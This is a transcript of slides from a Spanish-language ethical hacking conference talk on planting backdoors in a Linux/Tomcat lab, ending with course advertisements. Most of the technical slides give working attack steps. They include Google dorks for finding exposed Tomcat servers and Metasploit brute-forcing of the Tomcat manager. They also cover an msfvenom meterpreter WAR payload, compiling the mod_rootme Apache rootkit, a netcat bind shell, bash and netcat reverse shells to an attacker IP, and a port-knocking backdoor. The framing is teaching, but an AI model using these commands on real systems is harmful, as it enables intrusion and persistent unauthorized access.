Top Banner
25

Conferencia Innovación en Técnicas de Ethical Hacking

Jan 22, 2018

Download

Education

Hacking Bolivia
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Conferencia Innovación en Técnicas de Ethical Hacking
Page 2: Conferencia Innovación en Técnicas de Ethical Hacking

AGENDA 1. ¿Quién soy?

2. Buscando vulnerabilidades backdoors

3. ¿Qué es un backdoor?

1. Backdoor SETUID

2. Backdoor Módulo de APACHE

3. Backdoor Bind Shell

4. Backdoor Reverse Shell

5. Backdoor KnockOut

4. Instalando y configurando backdoors (ejemplos)

5. Información sobre el curso

6. Conclusiones

Page 3: Conferencia Innovación en Técnicas de Ethical Hacking

AGENDA 1. ¿Quién soy?

2. Buscando vulnerabilidades backdoors

3. ¿Qué es un backdoor?

1. Backdoor SETUID

2. Backdoor Módulo de APACHE

3. Backdoor Bind Shell

4. Backdoor Reverse Shell

5. Backdoor KnockOut

4. Instalando y configurando backdoors (ejemplos)

5. Información sobre el curso

6. Conclusiones

Page 4: Conferencia Innovación en Técnicas de Ethical Hacking

#whoami• Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH,

C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002

• Instructor Oficial de MILE2

• Consultor de Kunak Consulting SAC

http://www.kunak.com.pe

• Psicólogo que aun no comienza sus estudios….

• Escritor en mis tiempos libres:

http://www.el-palomo.com

• Correo electrónico:

[email protected]

[email protected]

• Cuenta de Facebook:• www.facebook.com/El.Palomo.Seguridad.Informacion

Page 5: Conferencia Innovación en Técnicas de Ethical Hacking

AGENDA 1. ¿Quién soy?

2. ¿Qué es un backdoor?

1. Backdoor SETUID

2. Backdoor Módulo de APACHE

3. Backdoor Bind Shell

4. Backdoor Reverse Shell

5. Backdoor KnockOut

3. Instalando y configurando backdoors (ejemplos)

4. Información sobre el curso

5. Conclusiones

Page 6: Conferencia Innovación en Técnicas de Ethical Hacking

¿Qué es un Backdoor (puerta trasera)?

• Los backdoors son programas utilizadospor los hackers para lograr acceso asistemas operativos de manera rápida ysencilla.

• Existen diferentes tipos de backdoors:

• Backdoors en Aplicaciones Web

• Backdoors a través de SETUID

• Backdoors en Módulos de Servicios

• Backdoors del tipo Knocking

Page 7: Conferencia Innovación en Técnicas de Ethical Hacking

Arquitectura de los Ejemplos

TARGET

- Servidor TOMCAT vulnerable

- Aquí se instalaran los backdoors

- Sistema Operativo Linux

ATACANTE

- Computador desde el cual se

realizarán los ataques

- Sistema Operativo KALI LINUX 2

ATACANTE 2

- Computador desde el cual se

explotaran los backdoors

- Sistema Operativo Linux

Dirección IP: 192.168.4.131

Dirección IP: 192.168.4.130

Dirección IP: 192.168.4.132

Page 8: Conferencia Innovación en Técnicas de Ethical Hacking

Identificar Servicios TOMCAT

• Buscamos TOMCAT en la RED LAN através de NMAP

Nmap –sV –p 8080 –sS TARGET

auxiliary/scanner/portscan/syn

Buscamos TOMCAT/AXIS2 en INTERNET:

Google Dork:

intitle:"Tomcat Server Administration“

intitle:"Axis2 Happiness Page" +ext:jsp

Page 9: Conferencia Innovación en Técnicas de Ethical Hacking

Ahora si …. Vamos con los ejemplos

Page 10: Conferencia Innovación en Técnicas de Ethical Hacking

Identificar Vulnerabilidades en TOMCAT• Vamos a utilizar METASPLOIT para identificar

vulnerabilidades:Root> msfconsole

Root> search tomcat

Root> use auxiliary/scanner/http/tomcat_mgr_login

Root> show options

Root> set RHOSTS 192.168.4.130

Finalmente realizar la carga de un .WAR malicioso paraobtener acceso al sistema operativo.

msfvenom -p java/meterpreter/reverse_tcpLHOST=192.168.4.131 -f war > meterpreter.war

En el cliente:

Msf> use exploit/multi/handler

Msf> set payload java/meterpreter/reverse_tcp

Page 11: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor con SETUID • De pronto algunos nunca escucharon de los

permisos GETUID, SETUID y STICKY. Pues estemecanismo de backdoor está asociado a SETUID.

¿Entonces en que consiste el SETUID?El SETUID es un bit que permite a las aplicacionesejecutarse con los permisos de su propietario. Elconcepto puede sonar muy abstracto pero si ponemosun ejemplo es más facil entender, vamos a crear unarchivo llamado TEST.C y lo compilamos.

Page 12: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor con SETUID

Page 13: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor en Apache Server

• Cargamos un módulo en APACHE de talmanera que no se realicen cambios a nivel decódigo en los aplicativos PHP.

• ¿Cuántos administradores de Sistemasverifican los módulos cargados en Apache?

• Toca compilar un módulo de APACHE llamadoModROOTme.

https://github.com/jingchunzhang/backdoor_rootkit/tree/master/mod_rootme-0.4

Page 14: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor en Apache Server

• Comandos en el Sistema Operativo

root>cd mod_rootme-0.4/

root>Make Linux

root> cp mod_rootme2.so /etc/httpd/modules

root> /etc/init.d/httpd reload

En el cliente:

Root> nc 192.168.4.130 80

GET root

Page 15: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor: BindShell

• Las primeras herramientas utilizados porHackers fue la navaja suiza “NETCAT”.

• Una BindShell es un programacorriendo una SHELL dentro de unproceso de red.

• Una BindShell puede estar escrita encualquier lenguaje de programación.

http://netcat.sourceforge.net/download.php

Page 16: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor: Bind Shell

• Comandos en el sistema operativo:root>./configure --enable-DGAPING_SECURITY_HOLE

root>Make

root> cd src/

root> ./netcat -l -p 8443 -e /bin/sh

root> bg

En el CLIENTE:

C:\>nc64.exe 192.168.75.133 8443

Page 17: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor: Reverse Shell

• Tiene el mismo concepto que una

Bind Shell pero realizada de manera

reversa.

• Ahora es el servidor quien se

conecta a nuestro cliente. Esta

pensado para poder realizar

bypass de Firewalls.

Page 18: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor: Reverse Shell

• Reverse Shell con BASH

En el cliente:

nc64.exe -l -p 8080 -vvv

En el servidor:bash -i >& /dev/tcp/192.168.1.34/8080 0>&1

Page 19: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor: Reverse Shell

• Reverse Shell con NETCAT

En el cliente:

nc64.exe -l -p 8080 -vvv

En el servidor:./netcat -e /bin/sh 192.168.1.34 8080

Page 20: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor: KnockOut

• Knock viene del ingles tocar lapuerta.

• Este es un backdoor del tipo“Reverse Shell” que pasadesapercibido.

• Sólo puede ser accedido por aquelque conozca la combinación de la“puerta” correcta.

Page 21: Conferencia Innovación en Técnicas de Ethical Hacking

Backdoor: KnockOut

• En el servidor:• Root> $make servidor

• Root> ./knock-outd knock-out.conf eth5

• En el cliente (atacante):• Root> $make cliente

• Root> ./knock-outc 192.168.4.130 knock-out.conf

• Root> ./netcat -lv -p 64876

Page 22: Conferencia Innovación en Técnicas de Ethical Hacking

AGENDA 1. ¿Quién soy?

2. ¿Qué es un backdoor?

1. Backdoor SETUID

2. Backdoor Módulo de APACHE

3. Backdoor Bind Shell

4. Backdoor Reverse Shell

5. Backdoor KnockOut

3. Instalando y configurando backdoors (ejemplos)

4. Información sobre el curso

5. Conclusiones

Page 23: Conferencia Innovación en Técnicas de Ethical Hacking

Curso de Ethical Hacking

https://www.facebook.com/sistemasuni/

Lugar: Universidad Nacional de

Ingeniería (UNI) – Lima – Perú

Duración: 24 horas – Curso Básico

24 horas – Curso Avanzado

Certificado: A nombre de la Universidad

Nacional de Ingeniería (UNI)

Próximo Inicio: Inicios Recurrentes

Page 24: Conferencia Innovación en Técnicas de Ethical Hacking

Curso de Seguridad de Información

http://www.kunak.com.pe

Lugar: Miraflores – Lima – Perú

Duración: 60 horas

Certificado: A nombre Kunak

Consulting SAC

Próximo Inicio: Por definir

Page 25: Conferencia Innovación en Técnicas de Ethical Hacking